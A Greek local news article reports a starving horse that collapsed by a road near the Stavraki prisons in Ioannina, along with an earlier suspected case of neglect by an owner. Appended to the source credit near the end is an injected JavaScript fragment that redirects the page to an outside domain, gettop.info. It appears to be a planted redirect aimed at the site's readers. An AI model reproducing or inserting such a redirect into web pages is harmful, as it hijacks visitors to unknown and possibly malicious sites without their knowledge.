Άλογο κατέρρευσε από εξάντληση στην άκρη του δρόμου (ΕΙΚΟΝΕΣ)

0
14

 

Το βράδυ της Πέμπτης, διερχόμενοι οδηγοί σε δρόμο πλησίον των φυλακών Σταυρακίου εντόπισαν ένα αδύναμο άλογο να κείτεται στην άκρη του οδοστρώματος,με κίνδυνο να τραυματιστεί από διερχόμενα οχήματα ,αφού στο σημείο ο φωτισμός είναι ανεπαρκής, σύμφωνα με το epirus-tv-news.gr.

Το ζώο φαινόταν να έχει καταρρεύσει πιθανότατα από αδυναμία ,καθώς όση ώρα βρίσκονταν στο έδαφος με όση δύναμη του είχε απομείνει έψαχνε κάτι για να φάει.

Στο σημείο έσπευσαν άνδρες της αστυνομίας προκειμένου να μεριμνήσουν σε συνεργασία με τις αρμόδιες υπηρεσίες για την μεταφορά του ζώου σε ασφαλές και ζεστό σημείο, αφού στην περιοχή επικρατούν χαμηλές θερμοκρασίες.

alogo_ioannina3

Πριν από λίγες μέρες ένα ανάλογο περιστατικό είχε συμβεί στην ίδια περιοχή ,όταν ένα άλογο είχε πάλι καταρρεύσει στη μέση του δρόμου από αδυναμία ,αφού σύμφωνα με την καταγγελία που είχε γίνει στην αστυνομία ο κάτοχός του φέρεται να μην το φρόντιζε όπως έπρεπε, αφήνοντάς το σε χωράφι εκτεθειμένο στη βροχή και στο κρύο, χωρίς καμία απολύτως προστασία.

Τα μέλη του Φιλοζωικού Σωματείου είχαν μεταβεί τότε σε χωράφι στην Κιάφα όπου είχαν και την πληροφορία πως βρίσκονταν πεσμένο το άλογο .Μόνο που όταν μετέβησαν στην περιοχή το άλογο είχε εξαφανιστεί ,ενώ μέλος του συλλόγου είχε δει στην περιοχή του Σταυρακίου ένα άλογο με τον ιδιοκτήτη του να το τραβά να προχωρήσει με το ζόρι, παρόλο που ήταν αδύνατον να σταθεί στα πόδια του.

alogo_ioannina2
Για το περιστατικό είχε ενημερωθεί η Φιλοζωική και ο Ιππικός Όμιλος ,που παρακολουθούν και την υπόθεση .

Δεν πέρασαν πολλές ημέρες και το αποψινό περιστατικό εγκατάλειψης που μοιάζει πολύ με το παραπάνω έρχεται να προστεθεί στο προηγούμενο ,προκαλώντας θλίψη και προβληματισμό σχετικά με την ανευθυνότητα κάποιων ιδιοκτητών ζώων που για λόγους που μόνο εκείνοι γνωρίζουν, αφήνουν αβοήθητο το ζώο που κάποτε θέλησαν να αποκτήσουν ,ξεχνώντας πως από τη στιγμή που θα το κάνουν δικό τους ,θα είναι και αποκλειστικά υπεύθυνοι για τη φροντίδα του.

Άγνωστο παραμένει μέχρι στιγμής αν τα δύο περιστατικά είναι τυχαία ή σχετίζονται και έχουμε να κάνουμε με το ίδιο ταλαιπωρημένο ζώο.

Πηγή: epirus-tv-news.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here